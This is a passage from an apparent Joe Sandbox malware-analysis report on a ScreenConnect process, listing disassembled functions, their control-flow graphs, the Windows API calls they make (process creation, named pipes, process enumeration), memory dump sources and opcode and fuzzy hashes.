                                                                                                                                          control_flow_graph 255 5ef2278-5ef22d1 257 5ef22dc-5ef22e0 255->257 258 5ef22d3-5ef22d9 255->258 259 5ef22e8-5ef22fd 257->259 260 5ef22e2-5ef22e5 257->260 258->257 261 5ef22ff-5ef2308 259->261 262 5ef230b-5ef2362 CreateProcessAsUserW 259->262 260->259 261->262 263 5ef236b-5ef2393 262->263 264 5ef2364-5ef236a 262->264 264->263
                                                                                                                                          APIs
                                                                                                                                          • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05EF234F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateProcessUser
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2217836671-0
                                                                                                                                          • Opcode ID: 609f0802c80020847a713c7c60726d25b19cd4518a67736f64cb8e744ab4229d
                                                                                                                                          • Instruction ID: 1a3568454fa18ce61f214b8ecb825e467df0a2f3eab72ca61e9d7ccf500f06c0
                                                                                                                                          • Opcode Fuzzy Hash: 609f0802c80020847a713c7c60726d25b19cd4518a67736f64cb8e744ab4229d
                                                                                                                                          • Instruction Fuzzy Hash: 9B41477690020ADFDF10CFA9C880ADEBBF5FF48310F04842AEA58A7250D734A955CF50
                                                                                                                                          Function 05D95E70 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 345 5d95e70-5d9668e 347 5d9669a-5d966d0 K32EnumProcesses 345->347 348 5d96690-5d96698 345->348 349 5d966d9-5d96701 347->349 350 5d966d2-5d966d8 347->350 348->347 350->349
                                                                                                                                          APIs
                                                                                                                                          • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05D966BD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: EnumProcesses
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 84517404-0
                                                                                                                                          • Opcode ID: 6b31f481474ce67acba71638ff8cd0f9dcba95cbd7f71f6f207ae656c556d3e6
                                                                                                                                          • Instruction ID: 8b99afc043d2791ddb2f8a472a75aa96bb5239acaded0ed88df54a5f81b93cb6
                                                                                                                                          • Opcode Fuzzy Hash: 6b31f481474ce67acba71638ff8cd0f9dcba95cbd7f71f6f207ae656c556d3e6
                                                                                                                                          • Instruction Fuzzy Hash: 722145B5D002499FDB14CF9AC884BDEBBF4FB48310F10846EE918A7300C338A941CBA4
                                                                                                                                          Function 05EF174C Relevance: 1.6, APIs: 1, Instructions: 59pipeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 367 5ef174c-5ef26c8 369 5ef26ca-5ef26cd 367->369 370 5ef26d0-5ef2702 WaitNamedPipeW 367->370 369->370 371 5ef270b-5ef2733 370->371 372 5ef2704-5ef270a 370->372 372->371
                                                                                                                                          APIs
                                                                                                                                          • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05EF2646), ref: 05EF26EF
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: NamedPipeWait
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3146367894-0
                                                                                                                                          • Opcode ID: aa74b129856c1c4d2d6b1d77dc05911a5886707e17b949688551bdf8ac11fc16
                                                                                                                                          • Instruction ID: dce1c50727cda776971350021b7132cdd9d4974c7d99a3d44902a9836f0da418
                                                                                                                                          • Opcode Fuzzy Hash: aa74b129856c1c4d2d6b1d77dc05911a5886707e17b949688551bdf8ac11fc16
                                                                                                                                          • Instruction Fuzzy Hash: 172147B6C002498FDB20CF9AC844BEEBBF4FB48314F11842ED959A7241C778A545CFA1
                                                                                                                                          Function 05EF2680 Relevance: 1.6, APIs: 1, Instructions: 56pipeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 381 5ef2680-5ef26c8 383 5ef26ca-5ef26cd 381->383 384 5ef26d0-5ef2702 WaitNamedPipeW 381->384 383->384 385 5ef270b-5ef2733 384->385 386 5ef2704-5ef270a 384->386 386->385
                                                                                                                                          APIs
                                                                                                                                          • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05EF2646), ref: 05EF26EF
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354644131.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: NamedPipeWait
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3146367894-0
                                                                                                                                          • Opcode ID: 210ff64684301cf4e639f6b52f937cd6d44de87800676d4f6cf5b1106f3483e7
                                                                                                                                          • Instruction ID: eca4b99486d2c3ecdc8b90f6e401fa431f06fbd23fd42aae542eadfd2b1d523b
                                                                                                                                          • Opcode Fuzzy Hash: 210ff64684301cf4e639f6b52f937cd6d44de87800676d4f6cf5b1106f3483e7
                                                                                                                                          • Instruction Fuzzy Hash: EC2136B6C002098FDB24CF99C845BEEBBF4BF48314F15841ED959A7240C779A545CFA1
                                                                                                                                          Function 05D95E64 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D9679E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ProcessSession
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3779259828-0
                                                                                                                                          • Opcode ID: ff60cf17149e6890ea2e3abd46d1fcc81caea032715c3ea959bd058967162ccc
                                                                                                                                          • Instruction ID: 1e3df38187e695cb7d84d31a171ef7b666247b1e1d0029bb44f8a210d03fbbb6
                                                                                                                                          • Opcode Fuzzy Hash: ff60cf17149e6890ea2e3abd46d1fcc81caea032715c3ea959bd058967162ccc
                                                                                                                                          • Instruction Fuzzy Hash: D71142B5C002498FCB20CF9AC444BEEBBF4FB48324F10842AE818A7200C378A944CFA1
                                                                                                                                          Function 05D96739 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D9679E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ProcessSession
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3779259828-0
                                                                                                                                          • Opcode ID: 7a0d32fea12804e404d201ba29c7c7a0ab5771584733a3b135bd8bba2d075605
                                                                                                                                          • Instruction ID: 3740c649347442884c517866dfe6b42e9ac2be206a49a0b8f9c50c03e92a0e9e
                                                                                                                                          • Opcode Fuzzy Hash: 7a0d32fea12804e404d201ba29c7c7a0ab5771584733a3b135bd8bba2d075605
                                                                                                                                          • Instruction Fuzzy Hash: F31112B6C002498FCB20CF9AC444BDEBBF4FB48324F14842AE958A7240C778A945CFA1
                                                                                                                                          Function 05D96711 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D9679E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2354017646.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_5d90000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ProcessSession
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3779259828-0
                                                                                                                                          • Opcode ID: 733377e0aa6d90ab60e546d5928a5e437becd7af384838e43a4d113523b0b9f7
                                                                                                                                          • Instruction ID: e476069fa6f6d151cd2ffa75663fe2c32aa2ab9d5ec67582aeb20c71ecbbdf44
                                                                                                                                          • Opcode Fuzzy Hash: 733377e0aa6d90ab60e546d5928a5e437becd7af384838e43a4d113523b0b9f7
                                                                                                                                          • Instruction Fuzzy Hash: BB1105758042098FDF24CFA9D80479EBBF0AF88324F15C49AD498A7251C739A946CF61
                                                                                                                                          Function 01F4D670 Relevance: .1, Instructions: 75COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2320597607.0000000001F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F4D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_1f4d000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b9ecdaefa9e852412370f07b483806deecaee4aae0aee79e744a318a9cd07e01
                                                                                                                                          • Instruction ID: d5427b1e73084a0268e01b05decb7e82c6d176cba9e1fb9dea47dc52f0a43805
                                                                                                                                          • Opcode Fuzzy Hash: b9ecdaefa9e852412370f07b483806deecaee4aae0aee79e744a318a9cd07e01
                                                                                                                                          • Instruction Fuzzy Hash: 9F2137B6504280DFDB16DF58D9C0B2ABF65FB98320F20C569E9090B257C33BD856CBA1
                                                                                                                                          Function 01F4D66B Relevance: .1, Instructions: 56COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2320597607.0000000001F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F4D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_1f4d000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4d05a3e31c280b3a5cc5f815455a6480bec6afe6824d766976a72ef6ec818cf4
                                                                                                                                          • Instruction ID: 382e39b0b2c581ecfbfddcc17b70333302116fa591c1e68676073c09c7c7add8
                                                                                                                                          • Opcode Fuzzy Hash: 4d05a3e31c280b3a5cc5f815455a6480bec6afe6824d766976a72ef6ec818cf4
                                                                                                                                          • Instruction Fuzzy Hash: D411D376904280CFDB16CF54D9C4B1ABF72FB98320F24C6A9D9094B257C33AD45ACBA1
                                                                                                                                          Function 01F4D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2320597607.0000000001F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F4D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_1f4d000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b60e192063bb5e11f8ea8bc1bd086f5e0d0478212126bf990499d86dd48f87d7
                                                                                                                                          • Instruction ID: f7b150ff98084a035bd9159595e135c09b0e4c68194b8291d0b52bafc2c4a1b9
                                                                                                                                          • Opcode Fuzzy Hash: b60e192063bb5e11f8ea8bc1bd086f5e0d0478212126bf990499d86dd48f87d7
                                                                                                                                          • Instruction Fuzzy Hash: 1501A772404340DBE7218A5DCC84B66BF98EF512B4F18C11AED4D4B28BC27A9542CAB1
                                                                                                                                          Function 01F4D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.2320597607.0000000001F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F4D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_1f4d000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cb459593104f41a680cf930b634ab8d89564b85ffd7029727e2be39b121c881a
                                                                                                                                          • Instruction ID: a946c975b7c7a5ac900c57b135aed34df037b553cb20fd1ff878c2ddadbde242
                                                                                                                                          • Opcode Fuzzy Hash: cb459593104f41a680cf930b634ab8d89564b85ffd7029727e2be39b121c881a
                                                                                                                                          • Instruction Fuzzy Hash: BC01127140D3C09FE7138B298894B52BFB4EF53264F19C1DBE9888F1A7C2699845C772

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:16%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:37.5%
                                                                                                                                          Total number of Nodes:8
                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                          execution_graph 11398 7ff9cc3b8014 11399 7ff9cc3b801d 11398->11399 11400 7ff9cc3b8001 11399->11400 11401 7ff9cc3b80f6 SetProcessMitigationPolicy 11399->11401 11402 7ff9cc3b8152 11401->11402 11394 7ff9cc3b3642 11395 7ff9cc3d5850 CreateNamedPipeW 11394->11395 11397 7ff9cc3d5983 11395->11397

                                                                                                                                          Executed Functions

                                                                                                                                          Function 00007FF9CC6C5D61 Relevance: 3.2, Strings: 2, Instructions: 685COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 355 7ff9cc6c5d61-7ff9cc6c5d94 call 7ff9cc6c44e0 call 7ff9cc6c0d60 * 2 363 7ff9cc6c5d9a-7ff9cc6c5da8 355->363 364 7ff9cc6c6b2e-7ff9cc6c6b41 355->364 366 7ff9cc6c5daa-7ff9cc6c5dac 363->366 367 7ff9cc6c5dae-7ff9cc6c5dbd call 7ff9cc6c0120 363->367 368 7ff9cc6c5dc0-7ff9cc6c5dc2 366->368 367->368 371 7ff9cc6c5f02-7ff9cc6c5f05 368->371 372 7ff9cc6c5dc8-7ff9cc6c5de4 368->372 373 7ff9cc6c5f0b-7ff9cc6c5f16 371->373 374 7ff9cc6c6040-7ff9cc6c6047 371->374 372->371 391 7ff9cc6c5dea-7ff9cc6c5dfc 372->391 375 7ff9cc6c5f62-7ff9cc6c5f70 373->375 376 7ff9cc6c5f18-7ff9cc6c5f35 373->376 378 7ff9cc6c60d7-7ff9cc6c60de 374->378 379 7ff9cc6c604d-7ff9cc6c6054 374->379 375->374 385 7ff9cc6c6b4b-7ff9cc6c6b5c 376->385 386 7ff9cc6c5f3b-7ff9cc6c5f60 376->386 381 7ff9cc6c60e9-7ff9cc6c60fc 378->381 382 7ff9cc6c60e0-7ff9cc6c60e7 378->382 379->378 384 7ff9cc6c605a-7ff9cc6c6064 379->384 400 7ff9cc6c60fe-7ff9cc6c6103 381->400 401 7ff9cc6c610d-7ff9cc6c6115 381->401 382->381 388 7ff9cc6c6126-7ff9cc6c612d 382->388 384->388 394 7ff9cc6c606a-7ff9cc6c60d5 384->394 438 7ff9cc6c6b5d-7ff9cc6c6b6e 385->438 386->375 389 7ff9cc6c6133-7ff9cc6c613a 388->389 390 7ff9cc6c6391-7ff9cc6c6398 388->390 389->390 395 7ff9cc6c6140-7ff9cc6c6143 389->395 390->364 397 7ff9cc6c639e-7ff9cc6c63a5 390->397 398 7ff9cc6c5e4a-7ff9cc6c5e91 391->398 399 7ff9cc6c5dfe-7ff9cc6c5e1b 391->399 394->388 405 7ff9cc6c6145-7ff9cc6c6147 395->405 406 7ff9cc6c614c-7ff9cc6c615a 395->406 397->364 408 7ff9cc6c63ab-7ff9cc6c63bd 397->408 450 7ff9cc6c5ed4-7ff9cc6c5ed6 398->450 451 7ff9cc6c5e93-7ff9cc6c5e9d 398->451 418 7ff9cc6c6b42-7ff9cc6c6b4a 399->418 419 7ff9cc6c5e21-7ff9cc6c5e48 399->419 400->401 411 7ff9cc6c6b81-7ff9cc6c6c58 401->411 412 7ff9cc6c611b-7ff9cc6c611f 401->412 415 7ff9cc6c61fa-7ff9cc6c61fd 405->415 431 7ff9cc6c615c 406->431 432 7ff9cc6c615e 406->432 416 7ff9cc6c6409-7ff9cc6c6421 408->416 417 7ff9cc6c63bf-7ff9cc6c63ca 408->417 506 7ff9cc6c79f0-7ff9cc6c7a1a 411->506 412->388 424 7ff9cc6c6206-7ff9cc6c6214 415->424 425 7ff9cc6c61ff-7ff9cc6c6201 415->425 435 7ff9cc6c63cc-7ff9cc6c63dc 417->435 436 7ff9cc6c638d-7ff9cc6c638e 417->436 418->385 419->398 455 7ff9cc6c6218 424->455 456 7ff9cc6c6216 424->456 434 7ff9cc6c62b5-7ff9cc6c62bb 425->434 440 7ff9cc6c6160-7ff9cc6c6163 431->440 432->440 441 7ff9cc6c62c1-7ff9cc6c62c3 434->441 442 7ff9cc6c636d-7ff9cc6c636f 434->442 444 7ff9cc6c63e2-7ff9cc6c6407 435->444 445 7ff9cc6c6b6f-7ff9cc6c6b80 435->445 436->390 438->445 452 7ff9cc6c6165-7ff9cc6c61f8 440->452 453 7ff9cc6c616d-7ff9cc6c6178 440->453 441->442 454 7ff9cc6c62c9-7ff9cc6c62fd 441->454 442->390 449 7ff9cc6c6371-7ff9cc6c6379 442->449 444->416 445->411 449->390 462 7ff9cc6c637b-7ff9cc6c638b 449->462 450->371 465 7ff9cc6c5ed8-7ff9cc6c5eff 450->465 464 7ff9cc6c5e9e-7ff9cc6c5ed0 451->464 452->415 458 7ff9cc6c61c4-7ff9cc6c61d2 453->458 459 7ff9cc6c617a-7ff9cc6c618c 453->459 454->442 466 7ff9cc6c621a-7ff9cc6c621d 455->466 456->466 481 7ff9cc6c618d-7ff9cc6c6197 458->481 483 7ff9cc6c61d4 458->483 459->481 462->436 485 7ff9cc6c5ed2 464->485 465->371 469 7ff9cc6c6227-7ff9cc6c6232 466->469 470 7ff9cc6c621f-7ff9cc6c6225 466->470 479 7ff9cc6c6234-7ff9cc6c623f 469->479 480 7ff9cc6c627e-7ff9cc6c62a0 469->480 477 7ff9cc6c62a3-7ff9cc6c62b3 470->477 477->434 479->480 480->477 481->438 490 7ff9cc6c619d-7ff9cc6c61c2 481->490 485->450 490->458 509 7ff9cc6c79e8-7ff9cc6c79ea 506->509 510 7ff9cc6c7a1c-7ff9cc6c7a49 call 7ff9cc6c6ce8 * 2 506->510 511 7ff9cc6c79b8-7ff9cc6c79c3 509->511 512 7ff9cc6c79ec-7ff9cc6c79ef 509->512 512->506
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 6$*$E
                                                                                                                                          • API String ID: 0-3555483653
                                                                                                                                          • Opcode ID: e031ee2dd4a45dd9a1a5de5e4c364f19a2f85631405f1818c967ac4828ea3182
                                                                                                                                          • Instruction ID: b07e73f4747af3115bc805e163d3eaf48c8deb30bef163eb83347d46fd1071fb
                                                                                                                                          • Opcode Fuzzy Hash: e031ee2dd4a45dd9a1a5de5e4c364f19a2f85631405f1818c967ac4828ea3182
                                                                                                                                          • Instruction Fuzzy Hash: 8722F132E1CA870BE7AADF289A653B47F91EF95341F0841B9C48DC71D3DD69F8028A45
                                                                                                                                          Function 00007FF9CC6C6F20 Relevance: 2.0, Strings: 1, Instructions: 723COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 630 7ff9cc6c6f20-7ff9cc6c6f21 631 7ff9cc6c6f22-7ff9cc6c6f24 630->631 632 7ff9cc6c6ef2-7ff9cc6c6efb 631->632 633 7ff9cc6c6f26-7ff9cc6c6f2e 631->633 634 7ff9cc6c6f02-7ff9cc6c6f0b 632->634 637 7ff9cc6c6f32-7ff9cc6c6f34 633->637 636 7ff9cc6c6f12-7ff9cc6c6f1b 634->636 636->630 637->634 638 7ff9cc6c6f36-7ff9cc6c6f3e 637->638 640 7ff9cc6c6f42-7ff9cc6c6f44 638->640 640->636 641 7ff9cc6c6f46-7ff9cc6c6f54 640->641 641->631 643 7ff9cc6c6f55-7ff9cc6c6f64 641->643 643->637 645 7ff9cc6c6f66-7ff9cc6c6f74 643->645 645->640 647 7ff9cc6c6f76-7ff9cc6c6f77 645->647 648 7ff9cc6c6f78 647->648 649 7ff9cc6c6f79-7ff9cc6c6f7c 647->649 648->649 649->643 650 7ff9cc6c6f7e-7ff9cc6c6f87 649->650 651 7ff9cc6c6f88 650->651 652 7ff9cc6c6f89-7ff9cc6c6faa 650->652 651->652 652->648 655 7ff9cc6c6fac-7ff9cc6c6fba 652->655 655->651 657 7ff9cc6c6fbc-7ff9cc6c6fcc 655->657 659 7ff9cc6c7016-7ff9cc6c701c 657->659 660 7ff9cc6c6fce-7ff9cc6c6fea 657->660 665 7ff9cc6c7023-7ff9cc6c7026 659->665 661 7ff9cc6c73f8-7ff9cc6c7416 call 7ff9cc6c0d60 * 2 660->661 662 7ff9cc6c6ff0-7ff9cc6c700e call 7ff9cc6c0d60 * 2 660->662 680 7ff9cc6c7522-7ff9cc6c752d 661->680 681 7ff9cc6c741c-7ff9cc6c7423 661->681 678 7ff9cc6c7014-7ff9cc6c7015 662->678 679 7ff9cc6c728e-7ff9cc6c72ac call 7ff9cc6c0d60 * 2 662->679 668 7ff9cc6c7028-7ff9cc6c702a 665->668 669 7ff9cc6c702c-7ff9cc6c703a call 7ff9cc6c0120 665->669 672 7ff9cc6c703d-7ff9cc6c7052 668->672 669->672 682 7ff9cc6c7054-7ff9cc6c7056 672->682 683 7ff9cc6c7058-7ff9cc6c707c call 7ff9cc6c6c40 * 2 672->683 678->659 704 7ff9cc6c72d6-7ff9cc6c72f4 call 7ff9cc6c0d60 * 2 679->704 705 7ff9cc6c72ae-7ff9cc6c72b8 679->705 685 7ff9cc6c7436-7ff9cc6c7438 681->685 686 7ff9cc6c7425-7ff9cc6c7434 681->686 688 7ff9cc6c707f-7ff9cc6c7094 682->688 683->688 687 7ff9cc6c743f-7ff9cc6c7463 685->687 686->685 694 7ff9cc6c743a 686->694 699 7ff9cc6c7465-7ff9cc6c7482 687->699 700 7ff9cc6c74af-7ff9cc6c74c5 687->700 702 7ff9cc6c7096-7ff9cc6c7098 688->702 703 7ff9cc6c709a-7ff9cc6c70be call 7ff9cc6c6c40 * 2 688->703 694->687 715 7ff9cc6c7488-7ff9cc6c74ad 699->715 716 7ff9cc6c752e-7ff9cc6c7588 699->716 708 7ff9cc6c70c1-7ff9cc6c70d6 702->708 703->708 731 7ff9cc6c73ab-7ff9cc6c73b6 704->731 732 7ff9cc6c72fa-7ff9cc6c7305 704->732 709 7ff9cc6c72cc 705->709 710 7ff9cc6c72ba-7ff9cc6c72ca 705->710 724 7ff9cc6c70d8-7ff9cc6c70da 708->724 725 7ff9cc6c70dc-7ff9cc6c70f4 call 7ff9cc6c6c40 708->725 713 7ff9cc6c72ce-7ff9cc6c72cf 709->713 710->713 713->704 715->700 735 7ff9cc6c758a-7ff9cc6c75a7 716->735 736 7ff9cc6c75d0-7ff9cc6c75ed 716->736 729 7ff9cc6c7103-7ff9cc6c7111 724->729 725->729 748 7ff9cc6c7113-7ff9cc6c7115 729->748 749 7ff9cc6c7117-7ff9cc6c7125 call 7ff9cc6c0120 729->749 743 7ff9cc6c73b8-7ff9cc6c73ba 731->743 744 7ff9cc6c73bc-7ff9cc6c73cb call 7ff9cc6c0120 731->744 746 7ff9cc6c7307-7ff9cc6c7309 732->746 747 7ff9cc6c730b-7ff9cc6c731a call 7ff9cc6c0120 732->747 750 7ff9cc6c75a9-7ff9cc6c75ce 735->750 751 7ff9cc6c75f0-7ff9cc6c7618 735->751 763 7ff9cc6c75ee 736->763 752 7ff9cc6c73ce-7ff9cc6c73d0 743->752 744->752 754 7ff9cc6c731d-7ff9cc6c7351 746->754 747->754 756 7ff9cc6c7128-7ff9cc6c7129 748->756 749->756 750->736 773 7ff9cc6c761a-7ff9cc6c7646 751->773 774 7ff9cc6c765f-7ff9cc6c7670 751->774 752->680 761 7ff9cc6c73d6-7ff9cc6c73e8 752->761 754->731 766 7ff9cc6c7353-7ff9cc6c7361 754->766 768 7ff9cc6c7130-7ff9cc6c7131 756->768 761->661 763->763 771 7ff9cc6c7374-7ff9cc6c737c 766->771 772 7ff9cc6c7363-7ff9cc6c736b 766->772 778 7ff9cc6c7138-7ff9cc6c713f 768->778 775 7ff9cc6c737d-7ff9cc6c737e 771->775 779 7ff9cc6c738e-7ff9cc6c73a8 771->779 772->775 776 7ff9cc6c736d-7ff9cc6c7372 772->776 791 7ff9cc6c7648-7ff9cc6c7649 773->791 792 7ff9cc6c764c-7ff9cc6c765d 773->792 782 7ff9cc6c76a2-7ff9cc6c76ab 774->782 783 7ff9cc6c7672-7ff9cc6c7681 774->783 784 7ff9cc6c7383-7ff9cc6c738d call 7ff9cc6c6c78 775->784 776->784 778->679 785 7ff9cc6c7145-7ff9cc6c714c 778->785 779->731 787 7ff9cc6c7683-7ff9cc6c7684 783->787 788 7ff9cc6c7687-7ff9cc6c76a1 783->788 784->779 785->679 789 7ff9cc6c7152-7ff9cc6c7169 785->789 787->788 799 7ff9cc6c716b-7ff9cc6c717d 789->799 800 7ff9cc6c719e-7ff9cc6c71a9 789->800 791->792 792->774 806 7ff9cc6c7183-7ff9cc6c7191 call 7ff9cc6c0120 799->806 807 7ff9cc6c717f-7ff9cc6c7181 799->807 804 7ff9cc6c71ab-7ff9cc6c71ad 800->804 805 7ff9cc6c71af-7ff9cc6c71be call 7ff9cc6c0120 800->805 808 7ff9cc6c71c1-7ff9cc6c71c3 804->808 805->808 810 7ff9cc6c7194-7ff9cc6c7197 806->810 807->810 813 7ff9cc6c7278-7ff9cc6c728a 808->813 814 7ff9cc6c71c9-7ff9cc6c71d7 808->814 810->800 813->679 817 7ff9cc6c71de-7ff9cc6c71e0 814->817 817->813 818 7ff9cc6c71e6-7ff9cc6c7203 817->818 821 7ff9cc6c7205-7ff9cc6c720d 818->821 822 7ff9cc6c720f 818->822 823 7ff9cc6c7211-7ff9cc6c7213 821->823 822->823 823->813 825 7ff9cc6c7215-7ff9cc6c721f 823->825 826 7ff9cc6c7221-7ff9cc6c722b call 7ff9cc6c18c0 825->826 827 7ff9cc6c722d-7ff9cc6c7235 825->827 826->679 826->827 829 7ff9cc6c7263-7ff9cc6c7276 call 7ff9cc6c6c68 827->829 830 7ff9cc6c7237-7ff9cc6c7242 827->830 829->679 830->817 835 7ff9cc6c7244-7ff9cc6c725c call 7ff9cc6c5528 830->835 835->829
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: H
                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                          • Opcode ID: 02b5151222ea49a7a139ffd7e982af5166ac0d8e06e5b6b2125919d5aa679731
                                                                                                                                          • Instruction ID: 1dfd0b51726bba4d2609c12e787e986714a4991c0b4bb341f060549cab34b41f
                                                                                                                                          • Opcode Fuzzy Hash: 02b5151222ea49a7a139ffd7e982af5166ac0d8e06e5b6b2125919d5aa679731
